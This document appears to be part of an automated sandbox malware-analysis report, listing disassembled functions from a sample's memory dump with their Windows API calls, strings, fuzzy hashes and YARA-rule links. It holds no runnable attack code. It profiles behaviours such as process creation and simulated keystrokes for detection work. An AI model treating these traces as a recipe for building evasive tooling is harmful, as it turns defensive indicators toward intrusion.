Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
Instruction ID: abec542faebebdc4988d6bf674f3035a6fd95b87b7908d869780c1b0496dcd10
Opcode Fuzzy Hash: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
Instruction Fuzzy Hash: EA21A175A40204BBDF54ABB0CC89FFEBBB9EF94300F500119B96197291EB7989259B20

Function 007C9D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 007C9D27
GetClassNameW.USER32(00000000,?,00000100), ref: 007C9D3C
_wcscmp.LIBCMT ref: 007C9D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007C9DC9

Strings

SHELLDLL_DefView, xrefs: 007C9D48
details, xrefs: 007C9D77
smallicons, xrefs: 007C9D91
list, xrefs: 007C9DAB
largeicons, xrefs: 007C9D5D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 6d8507f9818454f56699e90a2eadf89b2230e42dcb611c3d06c5546e1ed0bebb
Instruction ID: a76be39da19bdaf96801b499dd14ebdda5ce4ee6efddf1258a8ea694d689aaf7
Opcode Fuzzy Hash: 6d8507f9818454f56699e90a2eadf89b2230e42dcb611c3d06c5546e1ed0bebb
Instruction Fuzzy Hash: 6A11C476348716FAEA442660FC0EEA67398EF05720B20001EFA21B41E1FE6E6A515991

Function 007E8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007E8FC1
CoInitialize.OLE32(00000000), ref: 007E8FEE
CoUninitialize.OLE32 ref: 007E8FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 007E90F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 007E9225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00803BDC), ref: 007E9259
CoGetObject.OLE32(?,00000000,00803BDC,?), ref: 007E927C
SetErrorMode.KERNEL32(00000000), ref: 007E928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E930F
VariantClear.OLEAUT32(?), ref: 007E931F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
Instruction ID: 6349fdbc07074a89d64d6296bbec5ddc9c05139d1d1c5db976d0e562e139f547
Opcode Fuzzy Hash: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
Instruction Fuzzy Hash: 82C11372608345AFC740DF65C88892AB7E9FF89348F00491DFA8A9B251DB75ED05CB52

Function 007D19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007D19EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A03
GetWindowThreadProcessId.USER32(00000000), ref: 007D1A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 007D1A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1ABB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: df2293b521db3624461b14e36dfa58d1a2d0eecedd72a7bba334a882c0c011cc
Instruction ID: b9ab306e5f173c9759ac7754f37daff9644eacc5bbb501a9a43175a484435553
Opcode Fuzzy Hash: df2293b521db3624461b14e36dfa58d1a2d0eecedd72a7bba334a882c0c011cc
Instruction Fuzzy Hash: B0315CB1601304FFEB10DB54DD48BA97BBABBE4315F508516F905962A0DFB99D408F60

Function 007AC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0077260D
SetTextColor.GDI32(?,000000FF), ref: 00772617
SetBkMode.GDI32(?,00000001), ref: 0077262C
GetStockObject.GDI32(00000005), ref: 00772634
GetClientRect.USER32(?), ref: 007AC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 007AC113
GetWindowDC.USER32(?), ref: 007AC11F
GetPixel.GDI32(00000000,?,?), ref: 007AC12E
ReleaseDC.USER32(?,00000000), ref: 007AC140
GetSysColor.USER32(00000005), ref: 007AC15E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: c510897d4eb851a36b800b4d59878321bc4152b2938b8129db8eefca6a392a24
Instruction ID: c1a8320f1d4a693146028ae1d96763b63fc5166600f04e3068a3c21effcb62fa
Opcode Fuzzy Hash: c510897d4eb851a36b800b4d59878321bc4152b2938b8129db8eefca6a392a24
Instruction Fuzzy Hash: 01115E31500205BFDBA16FA4EC09BE97BB2FF59322F104265FA79A50E2CB360951EF11

Function 007CAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,007CB13A), ref: 007CB078

Strings

INSTANCE, xrefs: 007CAF86
CLASS, xrefs: 007CADF7
CLASSNN, xrefs: 007CAE1A
REGEXPCLASS, xrefs: 007CAE3D
NAME, xrefs: 007CAEAA
TEXT, xrefs: 007CAFAF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: b026fb76b1c4c84d12f90df1dbde6b150017b6b3956041e6370b610f8eaafae5
Instruction ID: 0847b6c70fc47fcaffebdef5bb8028d77df0e6e7edb56e15f7ed75b1252c7c4e
Opcode Fuzzy Hash: b026fb76b1c4c84d12f90df1dbde6b150017b6b3956041e6370b610f8eaafae5
Instruction Fuzzy Hash: 6791B37060011AEBCB18EFA0D486FEEFB74BF14304F50811DE95AA7151DF38A999CBA1

Function 007731F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0077327E

Part of subcall function 0077218F: GetClientRect.USER32(?,?), ref: 007721B8
Part of subcall function 0077218F: GetWindowRect.USER32(?,?), ref: 007721F9
Part of subcall function 0077218F: ScreenToClient.USER32(?,?), ref: 00772221

GetDC.USER32 ref: 007AD073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007AD086
SelectObject.GDI32(00000000,00000000), ref: 007AD094
SelectObject.GDI32(00000000,00000000), ref: 007AD0A9
ReleaseDC.USER32(?,00000000), ref: 007AD0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007AD13C

Strings

U, xrefs: 007AD011

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c4bd4ed98c954e3918f67afe483719d724b02ba75014430aabb44bcba2adc09e
Instruction ID: 1c5de56dae0ab649b05b17625877c4c26927df512993b5dc1afce6d7a3994027
Opcode Fuzzy Hash: c4bd4ed98c954e3918f67afe483719d724b02ba75014430aabb44bcba2adc09e
Instruction Fuzzy Hash: E871B130504209DFCF318F64C884ABA7BB5FF8A360F148369ED565A266C7398D41DF60

Function 007FC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007FC69C
ImageList_EndDrag.COMCTL32 ref: 007FC6A2
ReleaseCapture.USER32 ref: 007FC6A8
SetWindowTextW.USER32(?,00000000), ref: 007FC752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007FC765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007FC847

Strings

@GUI_DROPID, xrefs: 007FC799
@GUI_DRAGFILE, xrefs: 007FC7DC

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 6cadb244538a9a47c3413d18f4590ef1d2d3566fbf668698d585cbde7693eec5
Instruction ID: f2d0a02d2735fd7e1cdd0eb0a8f217f5a19a63e26e61288182110895b41fbcb3
Opcode Fuzzy Hash: 6cadb244538a9a47c3413d18f4590ef1d2d3566fbf668698d585cbde7693eec5
Instruction Fuzzy Hash: A3518C70208308EFDB14EF14CC59F6A7BE5FB84350F008929F6A5872A1CB75A945CB62

Function 007E9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00800980), ref: 007E9412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00800980), ref: 007E9446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007E95C0
SysFreeString.OLEAUT32(?), ref: 007E95EA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: d9569221d892d0dbbc78432ba3b1b1625225da5cefe2e2f9c199b6482a685e24
Instruction ID: f76b2a2611693b4f8b7be2f92bf24155d4e924028463f016e4800df085ef7c59
Opcode Fuzzy Hash: d9569221d892d0dbbc78432ba3b1b1625225da5cefe2e2f9c199b6482a685e24
Instruction Fuzzy Hash: D5F13B72A01209EFCF14DF95C888EAEB7B9FF49314F148058F616AB291DB35AE45CB50

Function 007EFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007EFD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007F0133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007F0165
CloseHandle.KERNEL32(?), ref: 007F0194
CloseHandle.KERNEL32(?), ref: 007F020B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 92ecaa9cf6022cd5653c6377a95c2de50542f6e863b8214eb11abca13e09dcfe
Instruction ID: a28f84035055b1c5400ed4df8ae6b59a00d4bcbd046c84198336fc8e9fbdde5a
Opcode Fuzzy Hash: 92ecaa9cf6022cd5653c6377a95c2de50542f6e863b8214eb11abca13e09dcfe
Instruction Fuzzy Hash: 6EE1A131204341DFCB14EF25C895B6ABBE1AF89350F14845DF5999B3A2DB39EC41CB92

Function 007D527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0

Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9

Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED

lstrcmpiW.KERNEL32(?,?), ref: 007D52FB
_wcscmp.LIBCMT ref: 007D5315
MoveFileW.KERNEL32(?,?), ref: 007D5330

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 8791429578984f31a1ebba0987f4d9a3a9bbc2f373ed2f6c4da7eb4399befb9c
Instruction ID: 5e2f9a9302f9731e6edfc5a47bc2787a77d3394d761dd7edf37502107234e8de
Opcode Fuzzy Hash: 8791429578984f31a1ebba0987f4d9a3a9bbc2f373ed2f6c4da7eb4399befb9c
Instruction Fuzzy Hash: E15176B20087859BC764EBA0D8859DFB3ECAF84301F50491FF189D3152EF38A6898766

Function 007F8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007F8D24

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 2345f7f48202def8a0a7f2dec4871ebe37a3d6b9cb48b57b0ec2319fdc8e82af
Instruction ID: 4edfb87e470497b3c5cdc2e7848dbe42b02e6205f8a7afc22a89b5120f5aebe0
Opcode Fuzzy Hash: 2345f7f48202def8a0a7f2dec4871ebe37a3d6b9cb48b57b0ec2319fdc8e82af
Instruction Fuzzy Hash: 6651A03064020CFEEFA09B28CC89BB93B64BF04350F244551F724EA3E1CF79A950DA62

Function 00772F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007AC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007AC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007AC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007AC6B1
DestroyIcon.USER32(00000000), ref: 007AC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007AC6DD
DestroyIcon.USER32(?), ref: 007AC6EC

Part of subcall function 007FAAD4: DeleteObject.GDI32(00000000), ref: 007FAB0D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
Instruction ID: 2612a8633651fff21989dcc968745ef678602e0311ec7e33e95266e4b240337e
Opcode Fuzzy Hash: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
Instruction Fuzzy Hash: EA514770600209EFDF24DF24CC49BAA77B5FB84750F108A28F956A72A0DB79E991DB50

Function 007CA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007CB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CB54D
Part of subcall function 007CB52D: GetCurrentThreadId.KERNEL32 ref: 007CB554
Part of subcall function 007CB52D: AttachThreadInput.USER32(00000000,?,007CA23B,?,00000001), ref: 007CB55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007CA263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007CA266
MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007CA28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA290
MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007CA2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA2B3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
Instruction ID: 4240c48d7e9a8684220fba218da0ea28fbe4ff9fb19b6d9404ad5076158ebfbf
Opcode Fuzzy Hash: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
Instruction Fuzzy Hash: 0211E1B1A50218BEF7106F609C8AF6A3B2DEB8C765F100419F354AB0D1CAF35C609EA0

Function 007C94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007C915A,00000B00,?,?), ref: 007C94E2
HeapAlloc.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C94E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C94FE
GetCurrentProcess.KERNEL32(?,00000000,?,007C915A,00000B00,?,?), ref: 007C9506
DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C9519
GetCurrentProcess.KERNEL32(007C915A,00000000,?,007C915A,00000B00,?,?), ref: 007C9521
DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9524
CreateThread.KERNEL32(00000000,00000000,007C954A,00000000,00000000,00000000), ref: 007C953E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
Instruction ID: 6ee8b91d3e990868b2ae2bcb146822e83068c72c3e5bad92259afa69b5b2ad0e
Opcode Fuzzy Hash: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
Instruction Fuzzy Hash: 1901B6B5640308BFE791ABA5DC4DF6B7BACFB89711F108411FA05DB2A1CA749800CF20

Function 007EA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 007EA265
NULL Pointer assignment, xrefs: 007EA28E, 007EA5B2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
